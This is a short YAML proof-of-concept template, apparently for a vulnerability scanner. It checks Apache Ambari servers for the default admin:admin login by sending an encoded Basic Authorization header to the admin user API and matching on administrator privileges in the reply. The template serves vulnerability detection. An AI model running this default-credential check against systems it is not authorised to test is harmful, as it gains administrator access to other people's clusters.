name: poc-yaml-apache-ambari-admin-dfpass
binding: 1f3a644e-c234-4363-bd7e-1f51edc418bf
manual: true
detail:
    author: wulalalaaa(https://github.com/wulalalaaa)
    links:
        - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
    vulnerability:
        id: CT-194185
        level: medium
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
            headers:
                Authorization: Basic YWRtaW46YWRtaW4=
        expression: response.status == 200 && response.body_string.contains("PrivilegeInfo") && response.body_string.contains("AMBARI.ADMINISTRATOR")
expression: r0()
